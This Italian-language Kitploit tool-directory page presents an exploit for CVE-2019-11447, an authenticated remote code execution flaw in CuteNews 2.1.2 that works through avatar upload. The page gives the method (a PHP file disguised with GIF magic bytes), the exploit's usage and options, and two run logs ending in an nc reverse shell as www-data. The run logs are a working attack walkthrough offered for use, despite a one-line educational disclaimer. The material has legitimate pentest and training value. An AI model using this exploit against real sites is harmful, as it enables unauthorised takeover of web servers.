Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2019-11447_CuteNews-AvatarUploadRCE — Codice exploit per CVE-2019-11447 noto anche come CuteNews 2.1.2 Caricamento avatar RCE (Autenticato) | Kitploit
Strumenti/GitHubGitHub/coldfusionx/cve-2019-11447_cutenews-avataruploadrce
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubcoldfusionx/cve-2019-11447_cutenews-avataruploadrce

CVE-2019-11447_CuteNews-AvatarUploadRCE

Codice exploit per CVE-2019-11447 noto anche come CuteNews 2.1.2 Caricamento avatar RCE (Autenticato)

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
35 anni faNon ancora revisionato

CVE-2019-11447 Exploit/PoC - CuteNews 2.1.2 Avatar upload RCE (Autenticato)

Codice exploit per CVE-2019-11447 noto anche come CuteNews 2.1.2 Avatar upload RCE (Autenticato)

Link dell'exploit:

Risultato atteso: accedere/registrare un account, creare un file PHP scelto dall'utente con magic bytes .gif, caricare il file come avatar e attivarlo per ottenere Remote Code Execution.

Destinato esclusivamente a scopo didattico e di test in ambienti aziendali.

Questo exploit è stato testato su Python 3.8.6

Utilizzo

root@kitploit:~
cfx:  ~/cutenews
→ ./exploit.py -h
usage: exploit.py [-h] [-l URL] [-u USERNAME] [-p PASSWORD] [-e EMAIL]

CuteNews 2.1.2 Avatar upload RCE (Authenticated) by ColdFusionX

optional arguments:
  -h, --help            show this help message and exit
  -l URL, --url URL     CuteNews URL (Example: http://127.0.0.1)
  -u USERNAME, --username USERNAME
                        Username to Login/Register
  -p PASSWORD, --password PASSWORD
                        Password to Login/Register
  -e EMAIL, --email EMAIL
                        Email to Login/Register

Exploit Usage :
./exploit.py -l http://127.0.0.1 -u cold -p fusion -e [email protected]
./exploit.py -l http://127.0.0.1 -u optimus -p prime -e [email protected]
[^] Select your PHP file -> rev.php
OR
[^] Select your PHP file -> ~/Downloads/rev.php
[^] Press y/n to trigger reverse shell -> y

Input dell'utente :

Questo exploit richiede quattro argomenti per essere eseguito inizialmente :

  • -l : URL di CuteNews
  • -u : Username necessario per Login/Registrazione
  • -p : Password necessaria per Login/Registrazione
  • -e : Email necessaria per Login/Registrazione

Ulteriori input utente richiesti:

  • Select your PHP file -> Qui l'utente deve specificare il file PHP da caricare; può essere qualsiasi file PHP, ad esempio: PHP info, reverse shell PHP. Se il file PHP si trova nella stessa directory dell'exploit, l'utente può semplicemente specificare il nome del file:

Esempio: [^] Select your PHP file -> rev.php

In alternativa, l'utente deve specificare la posizione del file PHP:

Esempio: [^] Select your PHP file -> ~/Downloads/rev.php

  • Press y/n to trigger reverse shell -> Qui, se l'utente ha caricato una reverse shell PHP, ha la possibilità di attivarla usando y/n.

In ogni caso, l'exploit è progettato per stampare la posizione del file caricato per un uso successivo.

Esecuzione dell'exploit

  • Scenario 1 > Accesso con credenziali esistenti e ottenimento di una reverse shell:
root@kitploit:~
cfx:  ~/cutenews
→ ./exploit.py -l http://127.0.0.1 -u optimus -p prime -e [email protected]
[+] CuteNews 2.1.2 Avatar Upload RCE exploit by ColdFusionX

[+] User exists ! Logged in Successfully
[^] Select your PHP file -> rev.php

[*] Adding Magic Byte to PHP file
[+] Upload Successful !!
[*] File location --> http://10.10.10.206/CuteNews/uploads/avatar_cold_cold.php

[^] Press y/n to trigger PHP file -> y
[*] Check listener for reverse shell
[*] Execution Completed

Shell

root@kitploit:~
cfx:  ~/cutenews
→ nc -lvnp 8020
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::8020
Ncat: Listening on 0.0.0.0:8020
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:32868.
Linux passage 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 03:06:04 up  4:15,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
prime    tty7     :0               22:50    4:15m  9.36s  0.69s /sbin/upstart --user
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ exit
  • Scenario 2 > Registrazione di un nuovo utente e ottenimento di una reverse shell:
root@kitploit:~
cfx:  ~/cutenews
→ ./exploit.py -l http://127.0.0.1 -u cold -p fusion -e [email protected]
[+] CuteNews 2.1.2 Avatar Upload RCE exploit by ColdFusionX

[+] Credentials cold:fusion Successfully Registered
[^] Select your PHP file -> rev.php

[*] Adding Magic Byte to PHP file
[+] Upload Successful !!
[*] File location --> http://127.0.0.1/CuteNews/uploads/avatar_cold_cold.php

[^] Press y/n to trigger PHP file -> y
[*] Check listener for reverse shell
[*] Execution Completed

Shell

root@kitploit:~
cfx:  ~/cutenews
→ nc -lvnp 8020
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::8020
Ncat: Listening on 0.0.0.0:8020
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:32868.
Linux passage 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 03:06:04 up  4:15,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
prime   tty7     :0               22:50    4:15m  9.36s  0.69s /sbin/upstart --user
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ exit

Riferimenti

  • https://nvd.nist.gov/vuln/detail/CVE-2019-11447
Scarica lo strumento